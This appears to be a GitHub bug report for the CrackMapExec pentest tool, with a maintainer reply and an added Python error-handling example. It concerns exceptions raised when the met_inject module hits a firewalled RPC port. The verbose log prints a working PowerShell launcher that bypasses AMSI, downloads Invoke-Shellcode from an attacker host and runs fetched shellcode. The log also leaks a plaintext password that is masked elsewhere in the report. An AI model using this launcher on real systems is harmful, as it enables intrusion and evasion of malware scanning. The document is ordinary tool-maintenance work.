CrackMapExec
Multiple exceptions thrown when executing command and RPC port is firewalled on target
Steps to reproduce
- Install the bleeding-edge version: pipenv install, pipenv shell, python setup.py install
- workon CrackmapExec-KTXXXXX
Command string used
sudo cme smb 192.168.2.0/24 -u céline -p XXXX -M met_inject -o LHOST=192.168.2.15 LPORT=4444 --server-port 5678
CME verbose output (using the --verbose flag)
DEBUG Passed args:
{'clear_obfscripts': False,
'content': False,
'cred_id': [],
'darrell': False,
'depth': None,
'disks': False,
'domain': None,
'exclude_dirs': '',
'exec_method': None,
'execute': None,
'fail_limit': None,
'force_ps32': False,
'gen_relay_list': None,
'gfail_limit': None,
'groups': None,
'hash': [],
'jitter': None,
'list_modules': False,
'local_auth': False,
'local_groups': None,
'loggedon_users': False,
'lsa': False,
'module': 'met_inject',
'module_options': ['LHOST=192.168.2.15', 'LPORT=4444'],
'no_output': False,
'ntds': None,
'obfs': False,
'only_files': False,
'pass_pol': False,
'password': ['XXXXX'],
'pattern': None,
'port': 445,
'protocol': 'smb',
'ps_execute': None,
'regex': None,
'rid_brute': None,
'sam': False,
'server': 'https',
'server_host': '0.0.0.0',
'server_port': 5678,
'sessions': False,
'share': 'C$',
'shares': False,
'show_module_options': False,
'spider': None,
'spider_folder': '.',
'target': ['192.168.2.0/24'],
'threads': 100,
'timeout': None,
'ufail_limit': None,
'username': ['c\xc3\xa9line'],
'users': None,
'verbose': True,
'wmi': None,
'wmi_namespace': 'root\\cimv2'}
DEBUG CME server type: https
DEBUG SMBv1 might be disabled on 192.168.2.5
DEBUG Error retrieving os arch of 192.168.2.1: Could not connect: [Errno 111] Connection refused
DEBUG Your pycrypto doesn't support AES.MODE_CCM. Currently only pycrypto experimental supports this mode.
Download it from https://www.dlitz.net/software/pycrypto
SMB 192.168.2.1 445 NONE [*] Unix (name:) (domain:WORKGROUP) (signing:False) (SMBv1:True)
DEBUG SMBv1 might be disabled on 192.168.2.5
SMB 192.168.2.5 445 LENOVO-PC [*] Windows 10.0 Build 17134 x64 (name:LENOVO-PC) (domain:LENOVO-PC) (signing:False) (SMBv1:False)
DEBUG add_credential(credtype=plaintext, domain=WORKGROUP, username=céline, password=Poulette77, groupid=None, pillaged_from=None) => None
SMB 192.168.2.1 445 NONE [+] WORKGROUP\céline:Poulette77 (Pwn3d!)
DEBUG Generated PS IEX Launcher:
[Net.ServicePointManager]::ServerCertificateValidationCallback = {$true}
IEX (New-Object Net.WebClient).DownloadString('https://192.168.2.15:5678/Invoke-Shellcode.ps1')
$CharArray = 48..57 + 65..90 + 97..122 | ForEach-Object {[Char]$_}
$SumTest = $False
while ($SumTest -eq $False)
{
$GeneratedUri = $CharArray | Get-Random -Count 4
$SumTest = (([int[]] $GeneratedUri | Measure-Object -Sum).Sum % 0x100 -eq 92)
}
$RequestUri = -join $GeneratedUri
$Request = "https://192.168.2.15:4444/$($RequestUri)"
$WebClient = New-Object System.Net.WebClient
[Byte[]]$bytes = $WebClient.DownloadData($Request)
Invoke-Shellcode -Force -Shellcode $bytes
DEBUG Generated PS command:
[Net.ServicePointManager]::ServerCertificateValidationCallback = {$true}
try{
[Ref].Assembly.GetType('Sys'+'tem.Man'+'agement.Aut'+'omation.Am'+'siUt'+'ils').GetField('am'+'siIni'+'tFailed', 'NonP'+'ublic,Sta'+'tic').SetValue($null, $true)
}catch{}
$functions = {
function Command-ToExecute
{
[Net.ServicePointManager]::ServerCertificateValidationCallback = {$true}
try{
[Ref].Assembly.GetType('Sys'+'tem.Man'+'agement.Aut'+'omation.Am'+'siUt'+'ils').GetField('am'+'siIni'+'tFailed', 'NonP'+'ublic,Sta'+'tic').SetValue($null, $true)
}catch{}
[Net.ServicePointManager]::ServerCertificateValidationCallback = {$true}
IEX (New-Object Net.WebClient).DownloadString('https://192.168.2.15:5678/Invoke-Shellcode.ps1')
$CharArray = 48..57 + 65..90 + 97..122 | ForEach-Object {[Char]$_}
$SumTest = $False
while ($SumTest -eq $False)
{
$GeneratedUri = $CharArray | Get-Random -Count 4
$SumTest = (([int[]] $GeneratedUri | Measure-Object -Sum).Sum % 0x100 -eq 92)
}
$RequestUri = -join $GeneratedUri
$Request = "https://192.168.2.15:4444/$($RequestUri)"
$WebClient = New-Object System.Net.WebClient
[Byte[]]$bytes = $WebClient.DownloadData($Request)
Invoke-Shellcode -Force -Shellcode $bytes
}
}
if ($Env:PROCESSOR_ARCHITECTURE -eq 'AMD64')
{
$job = Start-Job -InitializationScript $functions -ScriptBlock {Command-ToExecute} -RunAs32
$job | Wait-Job
}
else
{
IEX "$functions"
Command-ToExecute
}
DEBUG Error executing command via wmiexec, traceback:
DEBUG Traceback (most recent call last):
File "/home/toxic/.virtualenvs/CrackMapExec-KTynyVpX/lib/python2.7/site-packages/crackmapexec-4.0.1.dev0-py2.7.egg/cme/protocols/smb.py", line 391, in execute
exec_method = WMIEXEC(self.host, self.smb_share_name, self.username, self.password, self.domain, self.conn, self.hash, self.args.share)
File "/home/toxic/.virtualenvs/CrackMapExec-KTynyVpX/lib/python2.7/site-packages/crackmapexec-4.0.1.dev0-py2.7.egg/cme/protocols/smb/wmiexec.py", line 39, in __init__
self.__dcom = DCOMConnection(self.__target, self.__username, self.__password, self.__domain, self.__lmhash, self.__nthash, self.__aesKey, oxidResolver = True, doKerberos=self.__doKerberos)
File "/home/toxic/.virtualenvs/CrackMapExec-KTynyVpX/lib/python2.7/site-packages/crackmapexec-4.0.1.dev0-py2.7.egg/cme/thirdparty/impacket/impacket/dcerpc/v5/dcomrt.py", line 962, in __init__
self.initConnection()
File "/home/toxic/.virtualenvs/CrackMapExec-KTynyVpX/lib/python2.7/site-packages/crackmapexec-4.0.1.dev0-py2.7.egg/cme/thirdparty/impacket/impacket/dcerpc/v5/dcomrt.py", line 1051, in initConnection
self.__portmap.connect()
File "/home/toxic/.virtualenvs/CrackMapExec-KTynyVpX/lib/python2.7/site-packages/crackmapexec-4.0.1.dev0-py2.7.egg/cme/thirdparty/impacket/impacket/dcerpc/v5/rpcrt.py", line 801, in connect
return self._transport.connect()
File "/home/toxic/.virtualenvs/CrackMapExec-KTynyVpX/lib/python2.7/site-packages/crackmapexec-4.0.1.dev0-py2.7.egg/cme/thirdparty/impacket/impacket/dcerpc/v5/transport.py", line 302, in connect
raise DCERPCException("Could not connect: %s" % msg)
DCERPCException: Could not connect: [Errno 111] Connection refused
DEBUG Error executing command via mmcexec, traceback:
DEBUG Traceback (most recent call last):
File "/home/toxic/.virtualenvs/CrackMapExec-KTynyVpX/lib/python2.7/site-packages/crackmapexec-4.0.1.dev0-py2.7.egg/cme/protocols/smb.py", line 401, in execute
exec_method = MMCEXEC(self.host, self.smb_share_name, self.username, self.password, self.domain, self.conn, self.hash)
File "/home/toxic/.virtualenvs/CrackMapExec-KTynyVpX/lib/python2.7/site-packages/crackmapexec-4.0.1.dev0-py2.7.egg/cme/protocols/smb/mmcexec.py", line 65, in __init__
dcom = DCOMConnection(self.__host, self.__username, self.__password, self.__domain, self.__lmhash, self.__nthash, None, oxidResolver=True)
File "/home/toxic/.virtualenvs/CrackMapExec-KTynyVpX/lib/python2.7/site-packages/crackmapexec-4.0.1.dev0-py2.7.egg/cme/thirdparty/impacket/impacket/dcerpc/v5/dcomrt.py", line 962, in __init__
self.initConnection()
File "/home/toxic/.virtualenvs/CrackMapExec-KTynyVpX/lib/python2.7/site-packages/crackmapexec-4.0.1.dev0-py2.7.egg/cme/thirdparty/impacket/impacket/dcerpc/v5/dcomrt.py", line 1051, in initConnection
self.__portmap.connect()
File "/home/toxic/.virtualenvs/CrackMapExec-KTynyVpX/lib/python2.7/site-packages/crackmapexec-4.0.1.dev0-py2.7.egg/cme/thirdparty/impacket/impacket/dcerpc/v5/rpcrt.py", line 801, in connect
return self._transport.connect()
File "/home/toxic/.virtualenvs/CrackMapExec-KTynyVpX/lib/python2.7/site-packages/crackmapexec-4.0.1.dev0-py2.7.egg/cme/thirdparty/impacket/impacket/dcerpc/v5/transport.py", line 302, in connect
raise DCERPCException("Could not connect: %s" % msg)
DCERPCException: Could not connect: [Errno 111] Connection refused
DEBUG Executed command via atexec
DEBUG Your pycrypto doesn't support AES.MODE_CCM. Currently only pycrypto experimental supports this mode.
Download it from https://www.dlitz.net/software/pycrypto
DEBUG Your pycrypto doesn't support AES.MODE_CCM. Currently only pycrypto experimental supports this mode.
Download it from https://www.dlitz.net/software/pycrypto
Traceback (most recent call last):
File "/home/toxic/.virtualenvs/CrackMapExec-KTynyVpX/lib/python2.7/site-packages/gevent/greenlet.py", line 536, in run
result = self._run(*self.args, **self.kwargs)
File "/home/toxic/.virtualenvs/CrackMapExec-KTynyVpX/lib/python2.7/site-packages/crackmapexec-4.0.1.dev0-py2.7.egg/cme/protocols/smb.py", line 110, in __init__
connection.__init__(self, args, db, host)
File "/home/toxic/.virtualenvs/CrackMapExec-KTynyVpX/lib/python2.7/site-packages/crackmapexec-4.0.1.dev0-py2.7.egg/cme/connection.py", line 41, in __init__
self.proto_flow()
File "/home/toxic/.virtualenvs/CrackMapExec-KTynyVpX/lib/python2.7/site-packages/crackmapexec-4.0.1.dev0-py2.7.egg/cme/connection.py", line 75, in proto_flow
self.call_modules()
File "/home/toxic/.virtualenvs/CrackMapExec-KTynyVpX/lib/python2.7/site-packages/crackmapexec-4.0.1.dev0-py2.7.egg/cme/connection.py", line 105, in call_modules
self.module.on_admin_login(context, self)
File "/home/toxic/.virtualenvs/CrackMapExec-KTynyVpX/lib/python2.7/site-packages/crackmapexec-4.0.1.dev0-py2.7.egg/cme/modules/met_inject.py", line 65, in on_admin_login
connection.ps_execute(launcher, force_ps32=True)
File "/home/toxic/.virtualenvs/CrackMapExec-KTynyVpX/lib/python2.7/site-packages/crackmapexec-4.0.1.dev0-py2.7.egg/cme/connection.py", line 17, in _decorator
return func(self, *args, **kwargs)
File "/home/toxic/.virtualenvs/CrackMapExec-KTynyVpX/lib/python2.7/site-packages/crackmapexec-4.0.1.dev0-py2.7.egg/cme/protocols/smb.py", line 447, in ps_execute
return self.execute(create_ps_command(payload, force_ps32=force_ps32, dont_obfs=dont_obfs), get_output, methods)
File "/home/toxic/.virtualenvs/CrackMapExec-KTynyVpX/lib/python2.7/site-packages/crackmapexec-4.0.1.dev0-py2.7.egg/cme/connection.py", line 17, in _decorator
return func(self, *args, **kwargs)
File "/home/toxic/.virtualenvs/CrackMapExec-KTynyVpX/lib/python2.7/site-packages/crackmapexec-4.0.1.dev0-py2.7.egg/cme/protocols/smb.py", line 82, in _decorator
output = func(self, *args, **kwargs)
File "/home/toxic/.virtualenvs/CrackMapExec-KTynyVpX/lib/python2.7/site-packages/crackmapexec-4.0.1.dev0-py2.7.egg/cme/protocols/smb.py", line 431, in execute
output = u'{}'.format(exec_method.execute(payload, get_output).strip().decode('utf-8',errors='replace'))
File "/home/toxic/.virtualenvs/CrackMapExec-KTynyVpX/lib/python2.7/site-packages/crackmapexec-4.0.1.dev0-py2.7.egg/cme/protocols/smb/atexec.py", line 42, in execute
self.execute_handler(command)
File "/home/toxic/.virtualenvs/CrackMapExec-KTynyVpX/lib/python2.7/site-packages/crackmapexec-4.0.1.dev0-py2.7.egg/cme/protocols/smb/atexec.py", line 55, in execute_handler
self.doStuff(data)
File "/home/toxic/.virtualenvs/CrackMapExec-KTynyVpX/lib/python2.7/site-packages/crackmapexec-4.0.1.dev0-py2.7.egg/cme/protocols/smb/atexec.py", line 123, in doStuff
dce.connect()
File "/home/toxic/.virtualenvs/CrackMapExec-KTynyVpX/lib/python2.7/site-packages/crackmapexec-4.0.1.dev0-py2.7.egg/cme/thirdparty/impacket/impacket/dcerpc/v5/rpcrt.py", line 801, in connect
return self._transport.connect()
File "/home/toxic/.virtualenvs/CrackMapExec-KTynyVpX/lib/python2.7/site-packages/crackmapexec-4.0.1.dev0-py2.7.egg/cme/thirdparty/impacket/impacket/dcerpc/v5/transport.py", line 394, in connect
self.__handle = self.__smb_connection.openFile(self.__tid, self.__filename)
File "/home/toxic/.virtualenvs/CrackMapExec-KTynyVpX/lib/python2.7/site-packages/crackmapexec-4.0.1.dev0-py2.7.egg/cme/thirdparty/impacket/impacket/smbconnection.py", line 511, in openFile
raise SessionError(e.get_error_code(), e.get_error_packet())
SessionError: SMB SessionError: STATUS_OBJECT_NAME_NOT_FOUND(The object name is not found.)
Fri Jun 22 00:03:06 2018 <Greenlet at 0x7f3ffced97d0: smb(Namespace(clear_obfscripts=False, content=False, c, <protocol.database instance at 0x7f4001cf8050>, '192.168.2.1')> failed with SessionError
DEBUG add_credential(credtype=plaintext, domain=LENOVO-PC, username=céline, password=Poulette77, groupid=None, pillaged_from=None) => None
SMB 192.168.2.5 445 LENOVO-PC [+] LENOVO-PC\céline:XXXXX
CME Version (cme --version)
4.0.1dev - Bug Pr0n
OS
Archlinux
Target OS
Win10
Detailed issue explanation
All the SMB modules of CME have issues, even though I have the latest version correctly installed.
There's a lot that could have gone wrong here, but judging by the errors it looks like the Windows 10 box's RPC port wasn't open or has been firewalled. I might have to look into why this wasn't handled gracefully, as opposed to spewing exceptions everywhere.
Thanks for the report
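The graceful handling mentioned in the comment above, as an added example that is not CrackMapExec's or impacket's own code. It models the wmiexec -> mmcexec -> atexec fallback visible in the verbose log: each transport failure becomes one diagnostic line and the final result is returned to the caller, so no exception escapes the way the atexec SessionError did. The exception classes are stand-ins for impacket's DCERPCException and SMB SessionError, and the method runners, the function names (execute_with_fallback, diagnose) and the "smbexec" success path are constructed for the example.

```python
# Added example, not CrackMapExec's or impacket's own code. It models the
# wmiexec -> mmcexec -> atexec fallback seen in the verbose log and turns
# transport failures into one diagnostic line per method instead of an
# uncaught traceback. Exception classes, runners and messages are stand-ins
# constructed to match what the log shows.
import logging

logger = logging.getLogger("exec-fallback")


class DCERPCException(Exception):
    """Stand-in for impacket's DCERPCException (assumption: same role)."""


class SessionError(Exception):
    """Stand-in for impacket's SMB SessionError (assumption: same role)."""


# Error text seen in the log, mapped to a defender-friendly explanation.
DIAGNOSES = (
    ("Connection refused",
     "RPC endpoint mapper refused the connection: port closed or firewalled"),
    ("STATUS_OBJECT_NAME_NOT_FOUND",
     "named pipe missing on IPC$: service not exposed (e.g. non-Windows SMB server)"),
)


def diagnose(exc):
    """Return a one-line diagnosis for a transport error, or a generic one."""
    text = str(exc)
    for needle, explanation in DIAGNOSES:
        if needle in text:
            return explanation
    return "unexpected transport error: %s" % text


def execute_with_fallback(host, methods, payload):
    """Try each (name, runner) in order; runner(host, payload) returns output.

    Returns (method_name, output) on the first success, or
    (None, [diagnostic, ...]) when every method failed. Nothing propagates,
    and success is only logged after the runner actually returned.
    """
    failures = []
    for name, runner in methods:
        try:
            output = runner(host, payload)
        except (DCERPCException, SessionError) as exc:
            reason = diagnose(exc)
            failures.append("%s: %s" % (name, reason))
            logger.debug("%s: %s failed (%s)", host, name, reason)
            continue
        logger.debug("%s: executed command via %s", host, name)
        return name, output
    logger.error("%s: all execution methods failed", host)
    return None, failures


# Constructed runners reproducing the three failures from the report.
def _wmiexec(host, payload):
    raise DCERPCException("Could not connect: [Errno 111] Connection refused")


def _mmcexec(host, payload):
    raise DCERPCException("Could not connect: [Errno 111] Connection refused")


def _atexec(host, payload):
    raise SessionError(
        "SMB SessionError: STATUS_OBJECT_NAME_NOT_FOUND(The object name is not found.)")


def _smbexec_ok(host, payload):
    # Constructed success path so the happy case is visible too.
    return "output of %r on %s" % (payload, host)


FIREWALLED = [("wmiexec", _wmiexec), ("mmcexec", _mmcexec), ("atexec", _atexec)]
REACHABLE = FIREWALLED + [("smbexec", _smbexec_ok)]

if __name__ == "__main__":
    logging.basicConfig(level=logging.DEBUG)
    print(execute_with_fallback("192.168.2.1", FIREWALLED, "whoami"))
    print(execute_with_fallback("192.168.2.1", REACHABLE, "whoami"))
```

Logging success only after the runner returns avoids the misleading "Executed command via atexec" line that precedes the traceback in the report above; the caller gets a list of per-method reasons it can print once per host instead of three stack traces.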
I think this can be closed. As an aside, I updated the met_inject options information to specify some additional handlers/payloads that can be used instead of just web_delivery.